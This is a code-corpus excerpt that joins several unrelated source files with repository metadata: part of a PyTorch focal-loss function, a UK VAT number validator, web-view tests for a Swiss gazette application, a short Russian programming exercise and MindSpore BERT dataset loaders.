if alpha >= 0: alpha_t = alpha * targets + (1 - alpha) * (1 - targets) loss *= alpha_t if reduction == "mean": loss = loss.mean() elif reduction == "sum": loss = loss.sum() return loss sigmoid_focal_loss_star_jit = torch.jit.script( sigmoid_focal_loss_star ) # type: torch.jit.ScriptModule
34.883495
83
0.601169
539e2f99665eec34798cacbc4a08edf40cebdaf5
4,245
py
Python
frappe-bench/env/lib/python2.7/site-packages/stdnum/gb/vat.py
Semicheche/foa_frappe_docker
a186b65d5e807dd4caf049e8aeb3620a799c1225
[ "MIT" ]
null
null
null
frappe-bench/env/lib/python2.7/site-packages/stdnum/gb/vat.py
Semicheche/foa_frappe_docker
a186b65d5e807dd4caf049e8aeb3620a799c1225
[ "MIT" ]
null
null
null
frappe-bench/env/lib/python2.7/site-packages/stdnum/gb/vat.py
Semicheche/foa_frappe_docker
a186b65d5e807dd4caf049e8aeb3620a799c1225
[ "MIT" ]
null
null
null
# vat.py - functions for handling United Kingdom VAT numbers # # Copyright (C) 2012-2015 Arthur de Jong # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA # 02110-1301 USA """VAT (United Kingdom (and Isle of Man) VAT registration number). The VAT number can either be a 9-digit standard number, a 12-digit standard number followed by a 3-digit branch identifier, a 5-digit number for government departments (first two digits are GD) or a 5-digit number for health authorities (first two digits are HA). The 9-digit variants use a weighted checksum. >>> validate('GB 980 7806 84') '980780684' >>> validate('802311781') # invalid check digit Traceback (most recent call last): ... InvalidChecksum: ... >>> format('980780684') '980 7806 84' """ from stdnum.exceptions import * from stdnum.util import clean def compact(number): """Convert the number to the minimal representation. This strips the number of any valid separators and removes surrounding whitespace.""" number = clean(number, ' -.').upper().strip() if number.startswith('GB'): number = number[2:] return number def checksum(number): """Calculate the checksum. The checksum is only used for the 9 digits of the number and the result can either be 0 or 42.""" weights = (8, 7, 6, 5, 4, 3, 2, 10, 1) return sum(w * int(n) for w, n in zip(weights, number)) % 97 def validate(number): """Check if the number is a valid VAT number. This checks the length, formatting and check digit.""" number = compact(number) if len(number) == 5: if not number[2:].isdigit(): raise InvalidFormat() if number.startswith('GD') and int(number[2:]) < 500: # government department pass elif number.startswith('HA') and int(number[2:]) >= 500: # health authority pass else: raise InvalidComponent() elif len(number) == 11 and number[0:6] in ('GD8888', 'HA8888'): if not number[6:].isdigit(): raise InvalidFormat() if number.startswith('GD') and int(number[6:9]) < 500: # government department pass elif number.startswith('HA') and int(number[6:9]) >= 500: # health authority pass else: raise InvalidComponent() if int(number[6:9]) % 97 != int(number[9:11]): raise InvalidChecksum() elif len(number) in (9, 12): if not number.isdigit(): raise InvalidFormat() # standard number: nnn nnnn nn # branch trader: nnn nnnn nn nnn (ignore the last thee digits) # restarting: 100 nnnn nn if int(number[:3]) >= 100: if checksum(number[:9]) not in (0, 42, 55): raise InvalidChecksum() else: if checksum(number[:9]) != 0: raise InvalidChecksum() else: raise InvalidLength() return number def is_valid(number): """Check if the number is a valid VAT number.""" try: return bool(validate(number)) except ValidationError: return False def format(number): """Reformat the number to the standard presentation format.""" number = compact(number) if len(number) == 5: # government department or health authority return number if len(number) == 12: # includes branch number return number[:3] + ' ' + number[3:7] + ' ' + number[7:9] + ' ' + number[9:] # standard number: nnn nnnn nn return number[:3] + ' ' + number[3:7] + ' ' + number[7:]
34.795082
84
0.636749
54eeee1ef2f2e2bf0363795cd01253c4393c049c
21,687
py
Python
tests/onegov/gazette/test_views_notice.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
tests/onegov/gazette/test_views_notice.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
tests/onegov/gazette/test_views_notice.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
from freezegun import freeze_time from io import BytesIO from onegov.gazette.models import GazetteNotice from onegov.pdf.utils import extract_pdf_info from tests.onegov.gazette.common import accept_notice from tests.onegov.gazette.common import edit_notice from tests.onegov.gazette.common import edit_notice_unrestricted from tests.onegov.gazette.common import login_users from tests.onegov.gazette.common import publish_issue from tests.onegov.gazette.common import reject_notice from tests.onegov.gazette.common import submit_notice def test_view_notice(gazette_app): # Check if the details of the notice is displayed correctly in the # display view (that is: organization, owner, group etc). admin, editor_1, editor_2, editor_3, publisher = login_users(gazette_app) with freeze_time("2017-11-01 11:00"): # create a notice for each editor for count, user in enumerate((editor_1, editor_2, editor_3)): manage = user.get('/notices/drafted/new-notice') manage.form['title'] = 'Titel {}'.format(count + 1) manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['at_cost'].select('yes') manage.form['billing_address'] = 'someone\nstreet\r\nplace' manage.form['issues'] = ['2017-44', '2017-45'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() # check if the notices are displayed correctly for number, owner, group in ( (1, 'First', True), (2, 'Second', True), (3, 'Third', False), ): for user in (editor_1, editor_2, editor_3, publisher): view = user.get(f'/notice/titel-{number}') assert f"Titel {number}" in view assert "1. Oktober 2017" in view assert "Govikon, 1. Januar 2019" in view assert "State Chancellerist" in view assert "Civic Community" in view assert "Education" in view assert "<dd>Ja</dd>" in view assert "someone<br>street<br>place" in view assert f"{owner} Editor" in view assert f"+4141511227{number}" in view assert f"<br>editor{number}@example.org" in view if group: assert "TestGroup" in view else: assert "TestGroup" not in view assert "Nr. 44, 03.11.2017" in view assert "Nr. 45, 10.11.2017" in view assert "in Arbeit" in view assert "erstellt" in view # Check if the publication numbers are displayed submit_notice(editor_1, 'titel-1') submit_notice(editor_2, 'titel-2') submit_notice(editor_3, 'titel-3') accept_notice(publisher, 'titel-1') accept_notice(publisher, 'titel-2') accept_notice(publisher, 'titel-3') publish_issue(publisher, '2017-44') publish_issue(publisher, '2017-45') for number in range(1, 4): for user in (editor_1, editor_2, editor_3, publisher): view = user.get('/notice/titel-{}'.format(number)) assert "Nr. 44, 03.11.2017 / {}".format(number) in view assert "Nr. 45, 10.11.2017 / {}".format(number + 3) in view def test_view_notice_actions(gazette_app): # Check if the actions are displayed correctly in the detail view admin, editor_1, editor_2, editor_3, publisher = login_users(gazette_app) with freeze_time("2017-11-01 11:00"): # create a notice for each editor for count, user in enumerate( (editor_1, editor_2, editor_3, publisher) ): manage = user.get('/notices/drafted/new-notice') manage.form['title'] = 'Titel {}'.format(count + 1) manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['issues'] = ['2017-44'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() # check the actions actions = { 'p': 'action-preview', 't': 'action-attachments', 'c': 'action-copy', 'e': 'action-edit', 'd': 'action-delete', 's': 'action-submit', 'a': 'action-accept', 'r': 'action-reject' } def check(values): for user, slug, can in values: view = user.get('/notice/{}'.format(slug)) cannot = [x for x in actions.keys() if x not in can] assert all((actions[action] in view for action in can)) assert all((actions[action] not in view for action in cannot)) # ... when drafted check(( (admin, 'titel-1', 'pteds'), (admin, 'titel-2', 'pteds'), (admin, 'titel-3', 'pteds'), (admin, 'titel-4', 'pteds'), (publisher, 'titel-1', 'pteds'), (publisher, 'titel-2', 'pteds'), (publisher, 'titel-3', 'pteds'), (publisher, 'titel-4', 'pteds'), (editor_1, 'titel-1', 'peds'), (editor_1, 'titel-2', 'peds'), (editor_1, 'titel-3', 'p'), (editor_1, 'titel-4', 'p'), (editor_2, 'titel-1', 'peds'), (editor_2, 'titel-2', 'peds'), (editor_2, 'titel-3', 'p'), (editor_2, 'titel-4', 'p'), (editor_3, 'titel-1', 'p'), (editor_3, 'titel-2', 'p'), (editor_3, 'titel-3', 'peds'), (editor_3, 'titel-4', 'p'), )) # ... when submitted submit_notice(editor_1, 'titel-1') submit_notice(editor_2, 'titel-2') submit_notice(editor_3, 'titel-3') submit_notice(publisher, 'titel-4') check(( (admin, 'titel-1', 'ptedar'), (admin, 'titel-2', 'ptedar'), (admin, 'titel-3', 'ptedar'), (admin, 'titel-4', 'ptedar'), (publisher, 'titel-1', 'ptear'), (publisher, 'titel-2', 'ptear'), (publisher, 'titel-3', 'ptear'), (publisher, 'titel-4', 'ptear'), (editor_1, 'titel-1', 'p'), (editor_1, 'titel-2', 'p'), (editor_1, 'titel-3', 'p'), (editor_1, 'titel-4', 'p'), (editor_2, 'titel-1', 'p'), (editor_2, 'titel-2', 'p'), (editor_2, 'titel-3', 'p'), (editor_2, 'titel-4', 'p'), (editor_3, 'titel-1', 'p'), (editor_3, 'titel-2', 'p'), (editor_3, 'titel-3', 'p'), (editor_3, 'titel-4', 'p'), )) # ... when rejected reject_notice(publisher, 'titel-1') reject_notice(publisher, 'titel-2') reject_notice(publisher, 'titel-3') reject_notice(publisher, 'titel-4') check(( (admin, 'titel-1', 'pteds'), (admin, 'titel-2', 'pteds'), (admin, 'titel-3', 'pteds'), (admin, 'titel-4', 'pteds'), (publisher, 'titel-1', 'pteds'), (publisher, 'titel-2', 'pteds'), (publisher, 'titel-3', 'pteds'), (publisher, 'titel-4', 'pteds'), (editor_1, 'titel-1', 'peds'), (editor_1, 'titel-2', 'peds'), (editor_1, 'titel-3', 'p'), (editor_1, 'titel-4', 'p'), (editor_2, 'titel-1', 'peds'), (editor_2, 'titel-2', 'peds'), (editor_2, 'titel-3', 'p'), (editor_2, 'titel-4', 'p'), (editor_3, 'titel-1', 'p'), (editor_3, 'titel-2', 'p'), (editor_3, 'titel-3', 'peds'), (editor_3, 'titel-4', 'p'), )) # ... when accepted submit_notice(editor_1, 'titel-1') submit_notice(editor_2, 'titel-2') submit_notice(editor_3, 'titel-3') submit_notice(publisher, 'titel-4') accept_notice(publisher, 'titel-1') accept_notice(publisher, 'titel-2') accept_notice(publisher, 'titel-3') accept_notice(publisher, 'titel-4') check(( (admin, 'titel-1', 'ptedc'), (admin, 'titel-2', 'ptedc'), (admin, 'titel-3', 'ptedc'), (admin, 'titel-4', 'ptedc'), (publisher, 'titel-1', 'pedc'), (publisher, 'titel-2', 'pedc'), (publisher, 'titel-3', 'pedc'), (publisher, 'titel-4', 'pedc'), (editor_1, 'titel-1', 'pc'), (editor_1, 'titel-2', 'pc'), (editor_1, 'titel-3', 'pc'), (editor_1, 'titel-4', 'pc'), (editor_2, 'titel-1', 'pc'), (editor_2, 'titel-2', 'pc'), (editor_2, 'titel-3', 'pc'), (editor_2, 'titel-4', 'pc'), (editor_3, 'titel-1', 'pc'), (editor_3, 'titel-2', 'pc'), (editor_3, 'titel-3', 'pc'), (editor_3, 'titel-4', 'pc'), )) # ... when published publish_issue(publisher, '2017-44') check(( (admin, 'titel-1', 'ptec'), (admin, 'titel-2', 'ptec'), (admin, 'titel-3', 'ptec'), (admin, 'titel-4', 'ptec'), (publisher, 'titel-1', 'pec'), (publisher, 'titel-2', 'pec'), (publisher, 'titel-3', 'pec'), (publisher, 'titel-4', 'pec'), (editor_1, 'titel-1', 'pc'), (editor_1, 'titel-2', 'pc'), (editor_1, 'titel-3', 'pc'), (editor_1, 'titel-4', 'pc'), (editor_2, 'titel-1', 'pc'), (editor_2, 'titel-2', 'pc'), (editor_2, 'titel-3', 'pc'), (editor_2, 'titel-4', 'pc'), (editor_3, 'titel-1', 'pc'), (editor_3, 'titel-2', 'pc'), (editor_3, 'titel-3', 'pc'), (editor_3, 'titel-4', 'pc'), )) # ... when imported session = gazette_app.session() notice = session.query(GazetteNotice).filter_by(name='titel-1').one() notice.user = None notice.group = None notice.source = 'source' notice.state = 'imported' session.flush() import transaction transaction.commit() check(( (admin, 'titel-1', 'pda'), (publisher, 'titel-1', 'pad'), (editor_1, 'titel-1', 'p'), )) def test_view_notice_preview(gazette_app): admin, editor_1, editor_2, editor_3, publisher = login_users(gazette_app) with freeze_time("2017-11-01 11:00"): manage = editor_1.get('/notices/drafted/new-notice') manage.form['title'] = 'Titel' manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['issues'] = ['2017-44', '2017-45'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() view = editor_1.get('/notice/titel/preview') assert "Titel" in view assert "1. Oktober 2017" in view assert "Govikon, 1. Januar 2019" in view assert "State Chancellerist" in view assert "Civic Community" not in view assert "Education" not in view assert "TestGroup" not in view assert "Nr. 44, 03.11.2017" not in view assert "Nr. 45, 10.11.2017" not in view assert "in Arbeit" not in view assert "erstellt" not in view def test_view_notice_pdf_preview(gazette_app): admin, editor_1, editor_2, editor_3, publisher = login_users(gazette_app) with freeze_time("2017-11-01 11:00"): manage = editor_1.get('/notices/drafted/new-notice') manage.form['title'] = 'Titel' manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['issues'] = ['2017-44', '2017-45'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() with freeze_time("2018-01-01 12:00"): response = editor_1.get('/notice/titel/preview-pdf') assert response.headers['Content-Type'] == 'application/pdf' assert response.headers['Content-Disposition'] == \ 'inline; filename=amtsblatt-govikon-titel.pdf' assert extract_pdf_info(BytesIO(response.body)) == ( 1, 'xxx Titel\n' ' 1. Oktober 2017\n' ' Govikon, 1. Januar 2019\n' ' State Chancellerist\n' '© 2018 Govikon 1' ) def test_view_notice_delete(gazette_app): admin, editor_1, editor_2, editor_3, publisher = login_users(gazette_app) with freeze_time("2017-11-01 11:00"): # delete a drafted notice for user in (editor_1, publisher): manage = editor_1.get('/notices/drafted/new-notice') manage.form['title'] = "Erneuerungswahlen" manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['issues'] = ['2017-44', '2017-45'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() manage = user.get('/notice/erneuerungswahlen/delete') manage = manage.form.submit().maybe_follow() assert "Meldung gelöscht." in manage # delete a submitted notice for user in (editor_1, publisher): manage = editor_1.get('/notices/drafted/new-notice') manage.form['title'] = "Erneuerungswahlen" manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['issues'] = ['2017-44', '2017-45'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() submit_notice(user, 'erneuerungswahlen') manage = user.get('/notice/erneuerungswahlen/delete') assert manage.forms == {} manage = admin.get('/notice/erneuerungswahlen/delete') manage.form.submit().maybe_follow() # delete a rejected notice for user in (editor_1, publisher): manage = editor_1.get('/notices/drafted/new-notice') manage.form['title'] = "Erneuerungswahlen" manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['issues'] = ['2017-44', '2017-45'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() submit_notice(user, 'erneuerungswahlen') reject_notice(publisher, 'erneuerungswahlen') manage = user.get('/notice/erneuerungswahlen/delete') manage = manage.form.submit().maybe_follow() assert "Meldung gelöscht." in manage # delete an accepted notice manage = editor_1.get('/notices/drafted/new-notice') manage.form['title'] = "Erneuerungswahlen" manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['issues'] = ['2017-44', '2017-45'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() submit_notice(editor_1, 'erneuerungswahlen') accept_notice(publisher, 'erneuerungswahlen') manage = editor_1.get('/notice/erneuerungswahlen/delete') assert manage.forms == {} manage = publisher.get('/notice/erneuerungswahlen/delete') assert "Diese Meldung wurde bereits angenommen!" in manage manage.form.submit().maybe_follow() # delete a published notice manage = editor_1.get('/notices/drafted/new-notice') manage.form['title'] = "Erneuerungswahlen" manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['issues'] = ['2017-44', '2017-45'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() submit_notice(editor_1, 'erneuerungswahlen') accept_notice(publisher, 'erneuerungswahlen') publish_issue(publisher, '2017-44') for user in (admin, editor_1, publisher): manage = user.get('/notice/erneuerungswahlen/delete') assert manage.forms == {} def test_view_notice_changelog(gazette_app): admin, editor_1, editor_2, editor_3, publisher = login_users(gazette_app) with freeze_time("2017-11-01 10:00"): manage = editor_1.get('/notices/drafted/new-notice') manage.form['title'] = "Erneuerungswahlen" manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['issues'] = ['2017-44', '2017-45'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() with freeze_time("2017-11-01 11:02"): submit_notice(editor_1, 'erneuerungswahlen') with freeze_time("2017-11-01 11:30"): reject_notice(publisher, 'erneuerungswahlen') with freeze_time("2017-11-01 11:45"): edit_notice(editor_2, 'erneuerungswahlen', organization='300') with freeze_time("2017-11-01 11:48"): submit_notice(editor_2, 'erneuerungswahlen') with freeze_time("2017-11-01 15:00"): accept_notice(publisher, 'erneuerungswahlen') with freeze_time("2017-11-01 16:00"): publish_issue(publisher, '2017-44') view = editor_1.get('/notice/erneuerungswahlen') changes = [ ''.join(i.strip() for i in td.itertext()) for td in view.pyquery('table.changes td') ] changes = sorted([ ( changes[4 * i + 0], changes[4 * i + 1], changes[4 * i + 2], changes[4 * i + 3] ) for i in range(len(changes) // 4) ]) assert changes == [ ('01.11.2017 11:00', 'First Editor', 'TestGroup', 'erstellt'), ('01.11.2017 12:02', 'First Editor', 'TestGroup', 'eingereicht'), ('01.11.2017 12:30', 'Publisher', '', 'zurückgewiesenXYZ'), ('01.11.2017 12:45', 'Second Editor', 'TestGroup', 'bearbeitet'), ('01.11.2017 12:48', 'Second Editor', 'TestGroup', 'eingereicht'), ('01.11.2017 16:00', 'Publisher', '', 'Druck beauftragt'), ('01.11.2017 16:00', 'Publisher', '', 'angenommen'), ('01.11.2017 17:00', 'Publisher', '', 'veröffentlicht') ] def test_view_notice_copy(gazette_app): admin, editor_1, editor_2, editor_3, publisher = login_users(gazette_app) with freeze_time("2017-10-01 12:00"): manage = editor_1.get('/notices/drafted/new-notice') manage.form['title'] = "Erneuerungswahlen" manage.form['organization'] = '200' manage.form['category'] = '11' manage.form['issues'] = ['2017-40'] manage.form['text'] = "1. Oktober 2017" manage.form['author_place'] = 'Govikon' manage.form['author_name'] = 'State Chancellerist' manage.form['author_date'] = '2019-01-01' manage.form.submit() submit_notice(editor_1, 'erneuerungswahlen') accept_notice(publisher, 'erneuerungswahlen') with freeze_time("2017-10-01 12:00"): edit_notice_unrestricted(publisher, 'erneuerungswahlen', note='NOTE!') with freeze_time("2018-01-01 12:00"): for user in (editor_1, editor_2, editor_3, publisher): manage = user.get('/notice/erneuerungswahlen').click("Kopieren") assert manage.form['title'].value == "Erneuerungswahlen" assert manage.form['organization'].value == '200' assert manage.form['category'].value == '11' assert manage.form['text'].value == "1. Oktober 2017" assert manage.form['issues'].value is None manage.form['issues'] = ['2018-1'] manage = manage.form.submit().maybe_follow() assert "Erneuerungswahlen" in user.get('/dashboard') assert "Erneuerungswahlen" in user.get('/notices/drafted') "NOTE!" in publisher.get('/notice/erneuerungswahlen-1') "NOTE!" in publisher.get('/notice/erneuerungswahlen-2') "NOTE!" in publisher.get('/notice/erneuerungswahlen-3') "NOTE!" in publisher.get('/notice/erneuerungswahlen-4')
39.647166
78
0.552451
07223f6646d28bbe8361254170c56512be80ca0b
401
py
Python
PMIa/2014/KUCHERYAVENKO_A_I/task_1_38.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
PMIa/2014/KUCHERYAVENKO_A_I/task_1_38.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
PMIa/2014/KUCHERYAVENKO_A_I/task_1_38.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
# Задача 1. Вариант 38. # Напишите программу, которая будет сообщать род деятельности и псевдоним под которым скрывается Аврора Жюпен. После вывода информации программа должна дожидаться пока пользователь нажмет Enter для выхода. # Kucheryavenko A. I. # 17.03.2016 print("Жорж Санд более известна, как французская писательница Амандина Аврора Люсиль Дюпен.") input("\n\nНажмите Enter для выхода.")
40.1
205
0.795511
db8ed35f7e5c7d36b8d26c3414a13e509c3b709d
13,031
py
Python
official/nlp/bert/src/dataset.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
1
2021-11-18T08:17:44.000Z
2021-11-18T08:17:44.000Z
official/nlp/bert/src/dataset.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
null
null
null
official/nlp/bert/src/dataset.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
2
2019-09-01T06:17:04.000Z
2019-10-04T08:39:45.000Z
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """ Data operations, will be used in run_pretrain.py """ import os import math import numpy as np import mindspore.common.dtype as mstype import mindspore.dataset as ds import mindspore.dataset.transforms.c_transforms as C from mindspore import log as logger class BucketDatasetGenerator: """ Provide data distribution of different gears for the bert network. Args: dataset (Dataset): The training dataset. batch_size (Int): The training batchsize. bucket_list (List): List of different sentence lengths,such as [128, 256, 512]. Default: None. """ def __init__(self, dataset, batch_size, bucket_list=None): self.dataset = dataset self.batch_size = batch_size self.bucket_list = bucket_list self.data_bucket = {bucket: [] for bucket in bucket_list} bucket_size = len(bucket_list) self.random_list = np.random.binomial(n=(bucket_size - 1), p=0.5, size=self.__len__()) self.random_list = (self.random_list + 2) % bucket_size self.random_list = [bucket_list[i] for i in self.random_list] self.iter = 0 def __next__(self): for item in self.iterator: for seq_length in self.bucket_list: if np.sum(item[1]) <= seq_length: self.data_bucket[seq_length].append(item) break for key in self.data_bucket.keys(): data = self.data_bucket[key] if len(data) >= self.batch_size and self.random_list[self.iter] == key: self.data_bucket[key] = self.data_bucket[key][self.batch_size:] arr = data[0] for i in range(1, self.batch_size): current_data = data[i] for j in range(len(current_data)): arr[j] = np.concatenate((arr[j], current_data[j])) res = () for label in arr: newlabel = np.reshape(label, (self.batch_size, -1)) res += (newlabel,) res += (np.array(key, np.int32),) self.iter += 1 return res raise StopIteration def __iter__(self): self.iterator = self.dataset.create_tuple_iterator(output_numpy=True) return self def __len__(self): return (self.dataset.get_dataset_size() // self.batch_size) - 1 def create_bert_dataset(device_num=1, rank=0, do_shuffle="true", data_dir=None, schema_dir=None, batch_size=32, bucket_list=None): """create train dataset""" # apply repeat operations files = os.listdir(data_dir) data_files = [] for file_name in files: if "tfrecord" in file_name: data_files.append(os.path.join(data_dir, file_name)) data_set = ds.TFRecordDataset(data_files, schema_dir if schema_dir != "" else None, columns_list=["input_ids", "input_mask", "segment_ids", "next_sentence_labels", "masked_lm_positions", "masked_lm_ids", "masked_lm_weights"], shuffle=ds.Shuffle.FILES if do_shuffle == "true" else False, num_shards=device_num, shard_id=rank, shard_equal_rows=True) if bucket_list: bucket_dataset = BucketDatasetGenerator(data_set, batch_size, bucket_list=bucket_list) data_set = ds.GeneratorDataset(bucket_dataset, column_names=["input_ids", "input_mask", "segment_ids", "next_sentence_labels", "masked_lm_positions", "masked_lm_ids", "masked_lm_weights", "sentence_flag"], shuffle=False) else: data_set = data_set.batch(batch_size, drop_remainder=True) ori_dataset_size = data_set.get_dataset_size() print('origin dataset size: ', ori_dataset_size) type_cast_op = C.TypeCast(mstype.int32) data_set = data_set.map(operations=type_cast_op, input_columns="masked_lm_ids") data_set = data_set.map(operations=type_cast_op, input_columns="masked_lm_positions") data_set = data_set.map(operations=type_cast_op, input_columns="next_sentence_labels") data_set = data_set.map(operations=type_cast_op, input_columns="segment_ids") data_set = data_set.map(operations=type_cast_op, input_columns="input_mask") data_set = data_set.map(operations=type_cast_op, input_columns="input_ids") # apply batch operations logger.info("data size: {}".format(data_set.get_dataset_size())) logger.info("repeat count: {}".format(data_set.get_repeat_count())) return data_set def create_ner_dataset(batch_size=1, repeat_count=1, assessment_method="accuracy", data_file_path=None, dataset_format="mindrecord", schema_file_path=None, do_shuffle=True, drop_remainder=True): """create finetune or evaluation dataset""" type_cast_op = C.TypeCast(mstype.int32) if dataset_format == "mindrecord": dataset = ds.MindDataset([data_file_path], columns_list=["input_ids", "input_mask", "segment_ids", "label_ids"], shuffle=do_shuffle) else: dataset = ds.TFRecordDataset([data_file_path], schema_file_path if schema_file_path != "" else None, columns_list=["input_ids", "input_mask", "segment_ids", "label_ids"], shuffle=do_shuffle) if assessment_method == "Spearman_correlation": type_cast_op_float = C.TypeCast(mstype.float32) dataset = dataset.map(operations=type_cast_op_float, input_columns="label_ids") else: dataset = dataset.map(operations=type_cast_op, input_columns="label_ids") dataset = dataset.map(operations=type_cast_op, input_columns="segment_ids") dataset = dataset.map(operations=type_cast_op, input_columns="input_mask") dataset = dataset.map(operations=type_cast_op, input_columns="input_ids") dataset = dataset.repeat(repeat_count) # apply batch operations dataset = dataset.batch(batch_size, drop_remainder=drop_remainder) return dataset def create_classification_dataset(batch_size=1, repeat_count=1, assessment_method="accuracy", data_file_path=None, schema_file_path=None, do_shuffle=True): """create finetune or evaluation dataset""" type_cast_op = C.TypeCast(mstype.int32) data_set = ds.TFRecordDataset([data_file_path], schema_file_path if schema_file_path != "" else None, columns_list=["input_ids", "input_mask", "segment_ids", "label_ids"], shuffle=do_shuffle) if assessment_method == "Spearman_correlation": type_cast_op_float = C.TypeCast(mstype.float32) data_set = data_set.map(operations=type_cast_op_float, input_columns="label_ids") else: data_set = data_set.map(operations=type_cast_op, input_columns="label_ids") data_set = data_set.map(operations=type_cast_op, input_columns="segment_ids") data_set = data_set.map(operations=type_cast_op, input_columns="input_mask") data_set = data_set.map(operations=type_cast_op, input_columns="input_ids") data_set = data_set.repeat(repeat_count) # apply batch operations data_set = data_set.batch(batch_size, drop_remainder=True) return data_set def generator_squad(data_features): for feature in data_features: yield (feature.input_ids, feature.input_mask, feature.segment_ids, feature.unique_id) def create_squad_dataset(batch_size=1, repeat_count=1, data_file_path=None, schema_file_path=None, is_training=True, do_shuffle=True): """create finetune or evaluation dataset""" type_cast_op = C.TypeCast(mstype.int32) if is_training: data_set = ds.TFRecordDataset([data_file_path], schema_file_path if schema_file_path != "" else None, columns_list=["input_ids", "input_mask", "segment_ids", "start_positions", "end_positions", "unique_ids", "is_impossible"], shuffle=do_shuffle) data_set = data_set.map(operations=type_cast_op, input_columns="start_positions") data_set = data_set.map(operations=type_cast_op, input_columns="end_positions") else: data_set = ds.GeneratorDataset(generator_squad(data_file_path), shuffle=do_shuffle, column_names=["input_ids", "input_mask", "segment_ids", "unique_ids"]) data_set = data_set.map(operations=type_cast_op, input_columns="segment_ids") data_set = data_set.map(operations=type_cast_op, input_columns="input_mask") data_set = data_set.map(operations=type_cast_op, input_columns="input_ids") data_set = data_set.map(operations=type_cast_op, input_columns="unique_ids") data_set = data_set.repeat(repeat_count) # apply batch operations data_set = data_set.batch(batch_size, drop_remainder=True) return data_set def create_eval_dataset(batchsize=32, device_num=1, rank=0, data_dir=None, schema_dir=None): """create evaluation dataset""" data_files = [] if os.path.isdir(data_dir): files = os.listdir(data_dir) for file_name in files: if "tfrecord" in file_name: data_files.append(os.path.join(data_dir, file_name)) else: data_files.append(data_dir) data_set = ds.TFRecordDataset(data_files, schema_dir if schema_dir != "" else None, columns_list=["input_ids", "input_mask", "segment_ids", "next_sentence_labels", "masked_lm_positions", "masked_lm_ids", "masked_lm_weights"], shard_equal_rows=True) ori_dataset_size = data_set.get_dataset_size() print("origin eval size: ", ori_dataset_size) dtypes = data_set.output_types() shapes = data_set.output_shapes() output_batches = math.ceil(ori_dataset_size / device_num / batchsize) padded_num = output_batches * device_num * batchsize - ori_dataset_size print("padded num: ", padded_num) if padded_num > 0: item = {"input_ids": np.zeros(shapes[0], dtypes[0]), "input_mask": np.zeros(shapes[1], dtypes[1]), "segment_ids": np.zeros(shapes[2], dtypes[2]), "next_sentence_labels": np.zeros(shapes[3], dtypes[3]), "masked_lm_positions": np.zeros(shapes[4], dtypes[4]), "masked_lm_ids": np.zeros(shapes[5], dtypes[5]), "masked_lm_weights": np.zeros(shapes[6], dtypes[6])} 